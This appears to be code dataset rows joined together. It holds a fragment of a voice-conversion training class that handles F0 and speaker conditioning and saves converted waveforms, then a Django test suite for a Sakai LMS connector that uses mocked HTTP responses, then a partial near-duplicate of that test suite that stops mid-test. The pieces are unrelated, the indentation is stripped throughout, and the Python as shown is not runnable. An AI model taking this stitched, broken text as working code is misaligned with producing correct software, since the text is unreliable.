f0 = self._get_f0_condition(batch, cv_spkr_name, use_cvfeats)
return f0
else:
return None
def _get_dec_h(self, batch, use_cvfeats=False, cv_spkr_name=None):
h, h_onehot = self._get_spkr_conditions(batch, cv_spkr_name, use_cvfeats)
if self.conf["decoder_f0"]:
f0 = self._get_f0_condition(batch, cv_spkr_name, use_cvfeats)
else:
f0 = None
if not self.conf["use_spkr_embedding"]:
if f0 is not None:
return torch.cat([f0, h_onehot], dim=-1), None
else:
return h_onehot, None
else:
if f0 is not None:
return f0, h
else:
return None, h
def _get_f0_condition(self, batch, cv_spkr_name, use_cvfeats=False):
if cv_spkr_name is not None:
# use specified cv speaker
lcf0 = self._get_cvf0(batch, cv_spkr_name)
else:
if use_cvfeats:
# use randomly selected cv speaker by dataset
lcf0 = batch["cv_lcf0"]
else:
# use org speaker
lcf0 = batch["lcf0"]
f0 = torch.cat([lcf0, batch["uv"]], axis=-1)
return f0
def _get_spkr_conditions(self, batch, cv_spkr_name, use_cvfeats=False):
if cv_spkr_name is not None:
# use specified cv speaker
B, T, _ = batch["in_feats"].size()
spkr_num = self.spkrs[cv_spkr_name]
h_onehot_np = create_one_hot(T, self.n_spkrs, spkr_num, B=B)
h_onehot = torch.tensor(h_onehot_np).to(self.device)
h = (torch.ones((B, T)).long() * self.spkrs[cv_spkr_name]).to(self.device)
else:
if use_cvfeats:
# use randomly selected cv speaker by dataset
h = batch["cv_h"].clone()
h_onehot = batch["cv_h_onehot"]
else:
# use org speaker
h_onehot = batch["org_h_onehot"]
h = batch["org_h"].clone()
h[:, :] = h[:, 0:1] # remove ignore_index (i.e., -100)
return h, h_onehot
def _get_cvf0(self, batch, spkr_name):
cv_lcf0s = []
for n in range(batch["in_feats"].size(0)):
org_lcf0 = self.scaler["lcf0"].inverse_transform(to_numpy(batch["lcf0"][n]))
cv_lcf0 = convert_f0(
self.scaler, org_lcf0, batch["org_spkr_name"][n], spkr_name
)
normed_cv_lcf0 = self.scaler["lcf0"].transform(cv_lcf0)
cv_lcf0s.append(torch.tensor(normed_cv_lcf0))
return torch.stack(cv_lcf0s, dim=0).float().to(self.device)
def _generate_cvwav(
self,
batch,
outputs,
cv_spkr_name=None,
tdir="dev_wav",
save_hdf5=True,
save_decoded=True,
n_samples=1,
):
tdir = self.expdir / tdir / str(self.steps)
feats = self._store_features(batch, outputs, cv_spkr_name, tdir)
if not (n_samples == -1 or n_samples > len(feats.keys())):
feats = dict((k, feats[k]) for k in random.sample(feats.keys(), n_samples))
for k in feats.keys():
Path(k).parent.mkdir(parents=True, exist_ok=True)
if save_hdf5:
self._save_decoded_to_hdf5(feats)
if save_decoded:
if self.conf["output_feat_type"] == "mcep":
self._save_decoded_world(feats)
else:
self._save_decoded_mlfb(feats)
def _store_features(self, batch, outputs, cv_spkr_name, tdir):
def inv_trans(k, feat):
if k not in self.conf["ignore_scaler"]:
return self.scaler[k].inverse_transform(feat)
else:
return feat
feats = {}
feat_type = self.conf["output_feat_type"]
for n in range(outputs["decoded"].size(0)):
org_spkr_name = batch["org_spkr_name"][n]
cv_name = org_spkr_name if cv_spkr_name is None else cv_spkr_name
wavf = tdir / f"{batch['flbl'][n]}_org-{org_spkr_name}_cv-{cv_name}.wav"
# feat
feats[wavf] = {}
flen = batch["flen"][n]
feat = to_numpy(outputs["decoded"][n][:flen])
if feat_type == "mcep":
feats[wavf]["cap"] = to_numpy(batch["cap"][n][:flen])
if not self.conf["use_mcep_0th"]:
org_mcep_0th = to_numpy(batch["mcep_0th"][n][:flen])
org_mcep = to_numpy(batch["in_feats"][n][:flen])
feat = np.ascontiguousarray(np.hstack([org_mcep_0th, feat]))
rmcep = np.ascontiguousarray(np.hstack([org_mcep_0th, org_mcep]))
feats[wavf]["rmcep"] = inv_trans(feat_type, rmcep)
else:
feats[wavf]["rmcep"] = None
feats[wavf]["feats"] = inv_trans(feat_type, feat)
# f0
org_cf0 = inv_trans("lcf0", to_numpy(batch["lcf0"][n][:flen]))
cv_cf0 = convert_f0(self.scaler, org_cf0, org_spkr_name, cv_name)
feats[wavf]["lcf0"] = cv_cf0
feats[wavf]["uv"] = to_numpy(batch["uv"][n][:flen])
feats[wavf]["f0"] = np.exp(cv_cf0) * feats[wavf]["uv"]
# save normed one as well
feats[wavf]["normed_lcf0"] = self.scaler["lcf0"].transform(cv_cf0)
feats[wavf]["normed_feat"] = feat
return feats
def _save_decoded_to_hdf5(self, feats):
type_features = ["feats", "normed_feat", "f0", "lcf0", "normed_lcf0", "uv"]
if self.conf["output_feat_type"] == "mcep":
type_features += ["cap"]
for k in type_features:
Parallel(n_jobs=self.n_jobs)(
[
delayed(feat2hdf5)(feat[k], path, ext=k)
for path, feat in feats.items()
]
)
def _save_decoded_mlfb(self, feats):
Parallel(n_jobs=self.n_jobs)(
[
delayed(mlfb2wavf)(
feats[wavf]["feats"],
wavf,
fs=self.feat_conf["fs"],
n_mels=self.feat_conf["mlfb_dim"],
fftl=self.feat_conf["fftl"],
win_length=self.feat_conf["win_length"],
hop_size=self.feat_conf["hop_size"],
fmin=self.feat_conf["fmin"],
fmax=self.feat_conf["fmax"],
plot=True,
)
for wavf in feats.keys()
]
)
def _save_decoded_world(self, feats):
Parallel(n_jobs=self.n_jobs)(
[
delayed(world2wav)(
feats[k]["f0"][:, 0].astype(np.float64),
feats[k]["feats"].astype(np.float64),
feats[k]["cap"].astype(np.float64),
rmcep=feats[k]["rmcep"].astype(np.float64),
wavf=k,
fs=self.conf["feature"]["fs"],
fftl=self.conf["feature"]["fftl"],
shiftms=self.conf["feature"]["shiftms"],
alpha=self.conf["feature"]["mcep_alpha"],
)
for k in feats.keys()
]
)
|
import pytest
from django.test import Client
from django.urls import reverse
from django.test.utils import override_settings
from mock import patch, MagicMock
from rest_framework import status
from urllib.parse import (
quote,
urljoin,
)
import requests
import requests_mock
from lms_connector.responses import (
ErrorLCResponse,
ErrorResponseCodes,
ErrorResponseDetails,
FormattedError,
)
from lms_connector.tests import fixtures
from lms_connector.tests.helpers import spy_on
from lms_connector.entities import Role
from lms_connector.connectors import sakai
from lms_connector import helpers
TEST_API_KEY = 'TEST_API_KEY'
"""
HELPERS
"""
def assert_headers(headers_dict, request_mock: requests_mock.Mocker):
auth_str = (
request_mock.request_history[0]
.headers['Authorization'].decode("utf-8")
)
auth_dict = {}
# The authorization ends up being a bytes string, parse out the info.
# The existence of a built in way to do this was not known at the
# time of writing.
for key_val_pair_str in auth_str.split(','):
key, value = key_val_pair_str.split('=', 1)
key = key.strip()
# Would fail if actual value starts/ends with legit ' or "
value = value.strip('"').strip("'").strip()
auth_dict[key] = value
assert (
auth_dict['oauth_consumer_key'] ==
headers_dict['HTTP_LMS_CLIENT_KEY']
)
assert (
auth_dict['oauth_token'] ==
headers_dict['HTTP_LMS_OAUTH_TOKEN']
)
"""
TESTS
"""
def _test_correct_api_key_is_required(url, method, api_key):
client = Client()
requester = getattr(client, method)
resp = requester(url, HTTP_API_KEY='invalid-api-key')
# Incorrect API key should return 403
assert resp.status_code == status.HTTP_403_FORBIDDEN
assert resp.json()['errors'] == [
{
'code': 'not_authenticated',
'detail': 'Authentication credentials were not provided.',
'source': 'NotAuthenticated',
'status': 403,
},
]
resp = requester(url, HTTP_API_KEY=api_key)
# Correct API key should return anything but 403
assert resp.status_code != status.HTTP_403_FORBIDDEN
@override_settings(API_KEY=TEST_API_KEY)
@pytest.mark.parametrize('view_name,kwargs,method', [
('auth_url', {}, 'get'),
('current_user', {}, 'get'),
('courses', {}, 'get'),
('course_enrollments', {'lms_course_id': 1}, 'get'),
('assignments', {'lms_course_id': 1, 'lms_assignment_id': 1}, 'get'),
('grades', {'lms_course_id': 1, 'lms_assignment_id': 1}, 'post'),
('django_test', {}, 'get'),
])
def test_urls_are_authenticated(view_name, kwargs, method):
url = reverse(view_name, kwargs=kwargs)
_test_correct_api_key_is_required(url, method, TEST_API_KEY)
def test_root_url():
client = Client()
response = client.get('/')
assert response.json() == {'healthy': u'\U0001F4AF'}
@patch('lms_connector.connectors.sakai.OAuth1Session', autospec=True)
def test_sakai_auth_url(oauth_mock):
"""
Test auth url retrieval for Sakai.
Test that we can retrieve a formatted Oauth1 URL for Sakai
"""
def mock_fetch_token(mock_oauth_token, mock_oauth_token_secret):
def mock_token_getter(mock_url):
return {
'oauth_token': mock_oauth_token,
'oauth_token_secret': mock_oauth_token_secret,
}
return mock_token_getter
mock_authorize_url = 'http://host/oauth-tool/authorize/'
another_mock = MagicMock()
another_mock.fetch_request_token.side_effect = mock_fetch_token(
fixtures.oauth_creds_dict['HTTP_LMS_OAUTH_TOKEN'],
fixtures.oauth_creds_dict['HTTP_LMS_OAUTH_SECRET'],
)
oauth_mock.return_value = another_mock
data = {
'request_token_url': 'http://host/oauth-tool/request_tokén',
'authorize_url': mock_authorize_url,
'callback_url': "http://this.doesnt.ma/tter",
}
headers = fixtures.get_mocked_headers('http://somebaseurl')
del headers['HTTP_LMS_OAUTH_TOKEN']
del headers['HTTP_LMS_OAUTH_SECRET']
client = Client()
resp = client.get(
reverse('auth_url'),
content_type='application/json',
data=data,
**headers,
)
expected_auth_url = (
f'{mock_authorize_url}'
f'?oauth_token={fixtures.oauth_creds_dict['HTTP_LMS_OAUTH_TOKEN']}'
)
assert resp.status_code == status.HTTP_200_OK
actual_resp_json = resp.json()
expected_resp_json = {
'auth_url': expected_auth_url,
'redirect_key': 'redirect_uri',
'oauth_token_secret': fixtures.oauth_creds_dict[
'HTTP_LMS_OAUTH_SECRET'
],
}
assert actual_resp_json == expected_resp_json
def test_bad_lms_type_raises_error():
"""
Test error raised with non real lms.
"""
fake_lms = 'This LMS does not exist'
expected_formatted_error = FormattedError(
source='get_connector',
code=ErrorResponseCodes.unsupported_lms,
detail=ErrorResponseDetails.lms_not_supported(fake_lms),
)
mocked_headers = fixtures.get_mocked_headers('http://something')
mocked_headers['HTTP_LMS_TYPE'] = fake_lms
client = Client()
resp = client.get(
reverse('courses'),
content_type='application/json',
**mocked_headers,
)
assert resp.status_code == status.HTTP_400_BAD_REQUEST
assert resp.json()['errors'] == [expected_formatted_error]
def test_list_courses():
mocked_lms_base_url = 'http://jjjjjjjj'
mocked_resource = sakai.COURSES_RESOURCE
mocked_url = urljoin(mocked_lms_base_url, mocked_resource)
mocked_status_code = status.HTTP_200_OK
mocked_headers = fixtures.get_mocked_headers(
lms_base_url=mocked_lms_base_url,
)
mock_title_1 = '학교는 재미있다'
mock_id_1 = 'someid1'
mock_title_2 = 'course title 2'
mock_id_2 = 'someid2'
mock_title_no_sites = 'mock title no sites'
mock_title_no_gradebook = 'course title no gradebook'
mocked_sakai_response = {
'site_collection': [
{
'id': mock_id_1,
'title': mock_title_1,
'sitePages': [{'title': 'Gradebook'}]
},
{
'id': mock_id_2,
'title': mock_title_2,
'sitePages': [
{'title': 'naaa'},
{'title': 'Gradebook'}
]
},
{
'title': mock_title_no_gradebook,
'sitePages': [{'title': 'NOPE'}]
},
{'title': mock_title_no_sites},
]
}
expected = {
'results': [
{'course_id': mock_id_1, 'title': mock_title_1},
{'course_id': mock_id_2, 'title': mock_title_2},
]
}
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.get(
mocked_url,
status_code=mocked_status_code,
json=mocked_sakai_response,
)
resp = client.get(
reverse('courses'),
**mocked_headers
)
assert resp.json() == expected
assert_headers(mocked_headers, http_mock)
def test_list_students_in_course():
mocked_lms_base_url = 'http://jjjjjjjj'
mock_course_id = 'somecourseid'
mocked_resource = sakai.STUDENTS_RESOURCE.format(
lms_course_id=mock_course_id
)
mocked_url = urljoin(mocked_lms_base_url, mocked_resource)
mocked_status_code = status.HTTP_200_OK
mocked_headers = fixtures.get_mocked_headers(
lms_base_url=mocked_lms_base_url
)
mock_student_id_1 = 'طالب علم'
mock_student_email_1 = 'étudiant@étudiant.com'
mock_student_first_name_1 = 'mock_student_first_name_1'
mock_student_last_name_1 = 'mock_student_last_name_1'
mock_student_user_name_1 = 'mock_student_user_name_1'
mock_student_id_2 = 'mock student 2'
mock_student_email_2 = 'mockstudent@two.com'
mock_student_first_name_2 = 'mock_student_first_name_2'
mock_student_last_name_2 = 'mock_student_last_name_2'
mock_student_user_name_2 = 'mock_student_user_name_2'
mocked_sakai_response = {
'grades_collection': [
{
'userId': mock_student_id_1,
'email': mock_student_email_1,
'role': Role.student.value,
'fname': mock_student_first_name_1,
'lname': mock_student_last_name_1,
'username': mock_student_user_name_1,
},
{
'userId': mock_student_id_2,
'email': mock_student_email_2,
'role': Role.student.value,
'fname': mock_student_first_name_2,
'lname': mock_student_last_name_2,
'username': mock_student_user_name_2,
},
]
}
expected = {
'results': [
{
'student_id': mock_student_id_1,
'email': mock_student_email_1,
'role': Role.student.value,
'first_name': mock_student_first_name_1,
'last_name': mock_student_last_name_1,
'user_name': mock_student_user_name_1,
},
{
'student_id': mock_student_id_2,
'email': mock_student_email_2,
'role': Role.student.value,
'first_name': mock_student_first_name_2,
'last_name': mock_student_last_name_2,
'user_name': mock_student_user_name_2,
},
]
}
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.get(
mocked_url,
status_code=mocked_status_code,
json=mocked_sakai_response,
)
resp = client.get(
reverse(
'course_enrollments',
kwargs={'lms_course_id': mock_course_id}
),
**mocked_headers
)
assert resp.json() == expected
assert_headers(mocked_headers, http_mock)
def test_get_current_user():
mocked_lms_base_url = 'http://jjjjjjjj'
mocked_resource = sakai.CURRENT_USER_RESOURCE
mocked_url = urljoin(mocked_lms_base_url, mocked_resource)
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.get(
mocked_url,
status_code=status.HTTP_200_OK,
json=fixtures.current_user_response,
)
resp = client.get(
reverse(
'current_user',
),
**fixtures.get_mocked_headers(mocked_lms_base_url)
)
expected = {
'result': {
'lms_user_id': fixtures.current_user_response['id'],
'email': fixtures.current_user_response['email'],
'first_name': fixtures.current_user_response['firstName'],
'last_name': fixtures.current_user_response['lastName'],
}
}
assert resp.json() == expected
assert resp.status_code == status.HTTP_200_OK
def test_get_assignment():
"""
Test getting an assignment.
Submit a quoted assignment id to the lms connector, and observe
that we call requests.get() using the unquoted version.
We mock the quoted version because requests.get() will automatically
quote the assignment id.
"""
mocked_lms_base_url = 'http://jjjjjjjj'
mock_lms_course_id = 'mock_lms_course_id'
mock_lms_assignment_id = 'mock lms assignment id'
mock_lms_assignment_id_quoted = quote(mock_lms_assignment_id)
# When the get request is made, the get itself will quote the
# assignment id.
mocked_resource_quoted = sakai.ASSIGNMENT_RESOURCE.format(
lms_course_id=mock_lms_course_id,
lms_assignment_id=mock_lms_assignment_id_quoted,
)
mocked_url_quoted = urljoin(mocked_lms_base_url, mocked_resource_quoted)
mocked_resource = sakai.ASSIGNMENT_RESOURCE.format(
lms_course_id=mock_lms_course_id,
lms_assignment_id=mock_lms_assignment_id,
)
mocked_url = urljoin(mocked_lms_base_url, mocked_resource)
requests.get = spy_on(requests.get)
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.get(
mocked_url_quoted,
status_code=status.HTTP_200_OK,
json=fixtures.sakai_get_assignment_response,
)
resp = client.get(
reverse(
'assignments',
kwargs={
'lms_course_id': mock_lms_course_id,
'lms_assignment_id': mock_lms_assignment_id_quoted,
},
),
**fixtures.get_mocked_headers(mocked_lms_base_url)
)
expected = {
'result': {
'title': fixtures.sakai_get_assignment_response['name'],
'max_grade':
fixtures.sakai_get_assignment_response['pointsPossible'],
}
}
assert resp.json() == expected
assert resp.status_code == status.HTTP_200_OK
# Check that we called get with the unquoted resource
actual_get_url = requests.get.mock.call_args_list[0][0][0]
assert actual_get_url == mocked_url
def test_post_grade():
"""
Test posting an assignment.
Via the URL submit a quoted assignment id, observe the unquoted
version in the body sent to the mock.
"""
mock_lms_assignment_id = 'mock lms assignment id'
mock_lms_assignment_id_quoted = quote(mock_lms_assignment_id)
assert '%20' in mock_lms_assignment_id_quoted
expected_post_to_sakai = {
'name': mock_lms_assignment_id,
'externalID': 'sssssssssssdddddd',
'pointsPossible': '100',
'scores': [{
'userId': '08f72871-4f03-4d76-8de6-eb35aba9f8f4',
'grade': '72'
}]}
expected_response_from_connector = {
"result": {
# In reality 'title' would be the 'lms_assigment_id' but given we
# are not testing a sakai sever they are not related as far
# as this unit test is concerned.
"title": "thinsusssslateONEMOREE",
"max_grade": 100,
"grades": [
{
"lms_student_id": "08f72871-4f03-4d76-8de6-eb35aba9f8f4",
"grade": "72"
}
]
}
}
mocked_lms_base_url = 'http://jjjjjjjj'
mock_lms_course_id = 'mock_lms_course_id'
mocked_resource_quoted = sakai.SCORES_RESOURCE.format(
lms_course_id=mock_lms_course_id,
)
mocked_url_quoted = urljoin(mocked_lms_base_url, mocked_resource_quoted)
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.post(
mocked_url_quoted,
status_code=status.HTTP_200_OK,
json=fixtures.sakai_post_grade_response,
)
resp = client.post(
reverse(
'grades',
kwargs={
'lms_course_id': mock_lms_course_id,
'lms_assignment_id': mock_lms_assignment_id_quoted,
},
),
content_type='application/json',
data=fixtures.sakai_post_grade_data,
**fixtures.get_mocked_headers(mocked_lms_base_url)
)
assert http_mock.request_history[0].json() == expected_post_to_sakai
assert resp.json() == expected_response_from_connector
def test_put_assignment():
"""
Test putting an assignment.
Via the URL submit a quoted assignment id, observe the unquoted
version in the body sent to the mock.
"""
mock_lms_assignment_id = 'mock lms assignment id'
mock_lms_assignment_id_quoted = quote(mock_lms_assignment_id)
assert '%20' in mock_lms_assignment_id_quoted
expected_post_to_sakai = {
'name': mock_lms_assignment_id,
'externalID': 'sssssssssssdddddd',
'pointsPossible': '100',
'scores': [],
}
expected_response_from_connector = {
"result": {
"title": "thinsusssslateONEMOREE",
"max_grade": 100,
}
}
mocked_lms_base_url = 'http://jjjjjjjj'
mock_lms_course_id = 'mock_lms_course_id'
mocked_resource = sakai.SCORES_RESOURCE.format(
lms_course_id=mock_lms_course_id,
)
mocked_url = urljoin(mocked_lms_base_url, mocked_resource)
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.post(
mocked_url,
status_code=status.HTTP_200_OK,
json=fixtures.sakai_post_assignment_response,
)
resp = client.put(
reverse(
'assignments',
kwargs={
'lms_course_id': mock_lms_course_id,
'lms_assignment_id': mock_lms_assignment_id_quoted,
},
),
content_type='application/json',
data=fixtures.sakai_post_assignment_data,
**fixtures.get_mocked_headers(mocked_lms_base_url)
)
assert http_mock.request_history[0].json() == expected_post_to_sakai
assert resp.json() == expected_response_from_connector
def test_post_assignment():
"""
Test posting an assignment to Sakai.
We submit a quoted assignment id via the URL and check that the
unquoted version is in the body posted to the mock.
"""
mock_lms_assignment_id = 'mock lms assignment id'
mock_lms_assignment_id_quoted = quote(mock_lms_assignment_id)
assert '%20' in mock_lms_assignment_id_quoted
expected_post_to_sakai = {
'name': mock_lms_assignment_id,
'externalID': 'sssssssssssdddddd',
'pointsPossible': '100',
'scores': [],
}
expected_response_from_connector = {
"result": {
"title": "thinsusssslateONEMOREE",
"max_grade": 100,
}
}
mocked_lms_base_url = 'http://jjjjjjjj'
mock_lms_course_id = 'mock_lms_course_id'
mocked_resource = sakai.SCORES_RESOURCE.format(
lms_course_id=mock_lms_course_id,
)
mocked_url = urljoin(mocked_lms_base_url, mocked_resource)
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.post(
mocked_url,
status_code=status.HTTP_200_OK,
json=fixtures.sakai_post_assignment_response,
)
resp = client.post(
reverse(
'assignments',
kwargs={
'lms_course_id': mock_lms_course_id,
'lms_assignment_id': mock_lms_assignment_id_quoted,
},
),
content_type='application/json',
data=fixtures.sakai_post_assignment_data,
**fixtures.get_mocked_headers(mocked_lms_base_url)
)
assert http_mock.request_history[0].json() == expected_post_to_sakai
assert resp.json() == expected_response_from_connector
def test_required_get_auth_headers():
"""
Test error response from missing auth headers.
"""
mock_authorize_url = 'http://host/oauth-tool/authorize/'
data = {
'request_token_url': 'http://host/oauth-tool/request_tokén',
'authorize_url': mock_authorize_url,
'callback_url': "http://this.doesnt.ma/tter",
}
headers = {
header_key: header_val
for header_key, header_val,
in fixtures.get_mocked_headers('http://somebaseurl').items()
if header_key == 'HTTP_LMS_TYPE'
}
client = Client()
resp = client.get(
reverse('auth_url'),
content_type='application/json',
data=data,
**headers,
)
expected_errors = []
for required_header in sakai.AUTH_REQUIRED_HEADERS:
expected_errors.append(FormattedError(
source=helpers.HEADERS_PROCESSOR,
code=ErrorResponseCodes.missing_required_header,
detail=helpers.internal_header_to_external(required_header)
))
expected_error_response = ErrorLCResponse(
status_code=status.HTTP_400_BAD_REQUEST,
errors=expected_errors,
)
assert resp.data == expected_error_response.data
@pytest.mark.parametrize('http_method,endpoint,endpoint_kwargs', [
('get', 'courses', {}),
('post', 'assignments', {'lms_course_id': '-', 'lms_assignment_id': '-'}),
])
def test_required_headers_via_get(http_method, endpoint, endpoint_kwargs):
mocked_lms_base_url = 'http://jjjjjjjj'
headers = {
header_key: header_val
for header_key, header_val,
in fixtures.get_mocked_headers(mocked_lms_base_url).items()
if header_key == 'HTTP_LMS_TYPE'
}
client = Client()
resp = getattr(client, http_method)(
reverse(
endpoint,
kwargs=endpoint_kwargs,
),
content_type='application/json',
**headers,
)
expected_errors = []
for required_header in sakai.DEFAULT_REQUIRED_HEADERS:
expected_errors.append(FormattedError(
source=helpers.HEADERS_PROCESSOR,
code=ErrorResponseCodes.missing_required_header,
detail=helpers.internal_header_to_external(required_header)
))
expected_error_response = ErrorLCResponse(
status_code=status.HTTP_400_BAD_REQUEST,
errors=expected_errors,
)
assert resp.data == expected_error_response.data
| import pytest
from django.test import Client
from django.urls import reverse
from django.test.utils import override_settings
from mock import patch, MagicMock
from rest_framework import status
from urllib.parse import (
quote,
urljoin,
)
import requests
import requests_mock
from lms_connector.responses import (
ErrorLCResponse,
ErrorResponseCodes,
ErrorResponseDetails,
FormattedError,
)
from lms_connector.tests import fixtures
from lms_connector.tests.helpers import spy_on
from lms_connector.entities import Role
from lms_connector.connectors import sakai
from lms_connector import helpers
TEST_API_KEY = 'TEST_API_KEY'
"""
HELPERS
"""
def assert_headers(headers_dict, request_mock: requests_mock.Mocker):
auth_str = (
request_mock.request_history[0]
.headers['Authorization'].decode("utf-8")
)
auth_dict = {}
# The authorization ends up being a bytes string, parse out the info.
# The existence of a built in way to do this was not known at the
# time of writing.
for key_val_pair_str in auth_str.split(','):
key, value = key_val_pair_str.split('=', 1)
key = key.strip()
# Would fail if actual value starts/ends with legit ' or "
value = value.strip('"').strip("'").strip()
auth_dict[key] = value
assert (
auth_dict['oauth_consumer_key'] ==
headers_dict['HTTP_LMS_CLIENT_KEY']
)
assert (
auth_dict['oauth_token'] ==
headers_dict['HTTP_LMS_OAUTH_TOKEN']
)
"""
TESTS
"""
def _test_correct_api_key_is_required(url, method, api_key):
client = Client()
requester = getattr(client, method)
resp = requester(url, HTTP_API_KEY='invalid-api-key')
# Incorrect API key should return 403
assert resp.status_code == status.HTTP_403_FORBIDDEN
assert resp.json()['errors'] == [
{
'code': 'not_authenticated',
'detail': 'Authentication credentials were not provided.',
'source': 'NotAuthenticated',
'status': 403,
},
]
resp = requester(url, HTTP_API_KEY=api_key)
# Correct API key should return anything but 403
assert resp.status_code != status.HTTP_403_FORBIDDEN
@override_settings(API_KEY=TEST_API_KEY)
@pytest.mark.parametrize('view_name,kwargs,method', [
('auth_url', {}, 'get'),
('current_user', {}, 'get'),
('courses', {}, 'get'),
('course_enrollments', {'lms_course_id': 1}, 'get'),
('assignments', {'lms_course_id': 1, 'lms_assignment_id': 1}, 'get'),
('grades', {'lms_course_id': 1, 'lms_assignment_id': 1}, 'post'),
('django_test', {}, 'get'),
])
def test_urls_are_authenticated(view_name, kwargs, method):
url = reverse(view_name, kwargs=kwargs)
_test_correct_api_key_is_required(url, method, TEST_API_KEY)
def test_root_url():
client = Client()
response = client.get('/')
assert response.json() == {'healthy': u'\U0001F4AF'}
@patch('lms_connector.connectors.sakai.OAuth1Session', autospec=True)
def test_sakai_auth_url(oauth_mock):
"""
Test auth url retrieval for Sakai.
Test that we can retrieve a formatted Oauth1 URL for Sakai
"""
def mock_fetch_token(mock_oauth_token, mock_oauth_token_secret):
def mock_token_getter(mock_url):
return {
'oauth_token': mock_oauth_token,
'oauth_token_secret': mock_oauth_token_secret,
}
return mock_token_getter
mock_authorize_url = 'http://host/oauth-tool/authorize/'
another_mock = MagicMock()
another_mock.fetch_request_token.side_effect = mock_fetch_token(
fixtures.oauth_creds_dict['HTTP_LMS_OAUTH_TOKEN'],
fixtures.oauth_creds_dict['HTTP_LMS_OAUTH_SECRET'],
)
oauth_mock.return_value = another_mock
data = {
'request_token_url': 'http://host/oauth-tool/request_tokén',
'authorize_url': mock_authorize_url,
'callback_url': "http://this.doesnt.ma/tter",
}
headers = fixtures.get_mocked_headers('http://somebaseurl')
del headers['HTTP_LMS_OAUTH_TOKEN']
del headers['HTTP_LMS_OAUTH_SECRET']
client = Client()
resp = client.get(
reverse('auth_url'),
content_type='application/json',
data=data,
**headers,
)
expected_auth_url = (
f'{mock_authorize_url}'
f'?oauth_token={fixtures.oauth_creds_dict["HTTP_LMS_OAUTH_TOKEN"]}'
)
assert resp.status_code == status.HTTP_200_OK
actual_resp_json = resp.json()
expected_resp_json = {
'auth_url': expected_auth_url,
'redirect_key': 'redirect_uri',
'oauth_token_secret': fixtures.oauth_creds_dict[
'HTTP_LMS_OAUTH_SECRET'
],
}
assert actual_resp_json == expected_resp_json
def test_bad_lms_type_raises_error():
"""
Test error raised with non real lms.
"""
fake_lms = 'This LMS does not exist'
expected_formatted_error = FormattedError(
source='get_connector',
code=ErrorResponseCodes.unsupported_lms,
detail=ErrorResponseDetails.lms_not_supported(fake_lms),
)
mocked_headers = fixtures.get_mocked_headers('http://something')
mocked_headers['HTTP_LMS_TYPE'] = fake_lms
client = Client()
resp = client.get(
reverse('courses'),
content_type='application/json',
**mocked_headers,
)
assert resp.status_code == status.HTTP_400_BAD_REQUEST
assert resp.json()['errors'] == [expected_formatted_error]
def test_list_courses():
mocked_lms_base_url = 'http://jjjjjjjj'
mocked_resource = sakai.COURSES_RESOURCE
mocked_url = urljoin(mocked_lms_base_url, mocked_resource)
mocked_status_code = status.HTTP_200_OK
mocked_headers = fixtures.get_mocked_headers(
lms_base_url=mocked_lms_base_url,
)
mock_title_1 = '학교는 재미있다'
mock_id_1 = 'someid1'
mock_title_2 = 'course title 2'
mock_id_2 = 'someid2'
mock_title_no_sites = 'mock title no sites'
mock_title_no_gradebook = 'course title no gradebook'
mocked_sakai_response = {
'site_collection': [
{
'id': mock_id_1,
'title': mock_title_1,
'sitePages': [{'title': 'Gradebook'}]
},
{
'id': mock_id_2,
'title': mock_title_2,
'sitePages': [
{'title': 'naaa'},
{'title': 'Gradebook'}
]
},
{
'title': mock_title_no_gradebook,
'sitePages': [{'title': 'NOPE'}]
},
{'title': mock_title_no_sites},
]
}
expected = {
'results': [
{'course_id': mock_id_1, 'title': mock_title_1},
{'course_id': mock_id_2, 'title': mock_title_2},
]
}
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.get(
mocked_url,
status_code=mocked_status_code,
json=mocked_sakai_response,
)
resp = client.get(
reverse('courses'),
**mocked_headers
)
assert resp.json() == expected
assert_headers(mocked_headers, http_mock)
def test_list_students_in_course():
mocked_lms_base_url = 'http://jjjjjjjj'
mock_course_id = 'somecourseid'
mocked_resource = sakai.STUDENTS_RESOURCE.format(
lms_course_id=mock_course_id
)
mocked_url = urljoin(mocked_lms_base_url, mocked_resource)
mocked_status_code = status.HTTP_200_OK
mocked_headers = fixtures.get_mocked_headers(
lms_base_url=mocked_lms_base_url
)
mock_student_id_1 = 'طالب علم'
mock_student_email_1 = 'étudiant@étudiant.com'
mock_student_first_name_1 = 'mock_student_first_name_1'
mock_student_last_name_1 = 'mock_student_last_name_1'
mock_student_user_name_1 = 'mock_student_user_name_1'
mock_student_id_2 = 'mock student 2'
mock_student_email_2 = 'mockstudent@two.com'
mock_student_first_name_2 = 'mock_student_first_name_2'
mock_student_last_name_2 = 'mock_student_last_name_2'
mock_student_user_name_2 = 'mock_student_user_name_2'
mocked_sakai_response = {
'grades_collection': [
{
'userId': mock_student_id_1,
'email': mock_student_email_1,
'role': Role.student.value,
'fname': mock_student_first_name_1,
'lname': mock_student_last_name_1,
'username': mock_student_user_name_1,
},
{
'userId': mock_student_id_2,
'email': mock_student_email_2,
'role': Role.student.value,
'fname': mock_student_first_name_2,
'lname': mock_student_last_name_2,
'username': mock_student_user_name_2,
},
]
}
expected = {
'results': [
{
'student_id': mock_student_id_1,
'email': mock_student_email_1,
'role': Role.student.value,
'first_name': mock_student_first_name_1,
'last_name': mock_student_last_name_1,
'user_name': mock_student_user_name_1,
},
{
'student_id': mock_student_id_2,
'email': mock_student_email_2,
'role': Role.student.value,
'first_name': mock_student_first_name_2,
'last_name': mock_student_last_name_2,
'user_name': mock_student_user_name_2,
},
]
}
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.get(
mocked_url,
status_code=mocked_status_code,
json=mocked_sakai_response,
)
resp = client.get(
reverse(
'course_enrollments',
kwargs={'lms_course_id': mock_course_id}
),
**mocked_headers
)
assert resp.json() == expected
assert_headers(mocked_headers, http_mock)
def test_get_current_user():
mocked_lms_base_url = 'http://jjjjjjjj'
mocked_resource = sakai.CURRENT_USER_RESOURCE
mocked_url = urljoin(mocked_lms_base_url, mocked_resource)
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.get(
mocked_url,
status_code=status.HTTP_200_OK,
json=fixtures.current_user_response,
)
resp = client.get(
reverse(
'current_user',
),
**fixtures.get_mocked_headers(mocked_lms_base_url)
)
expected = {
'result': {
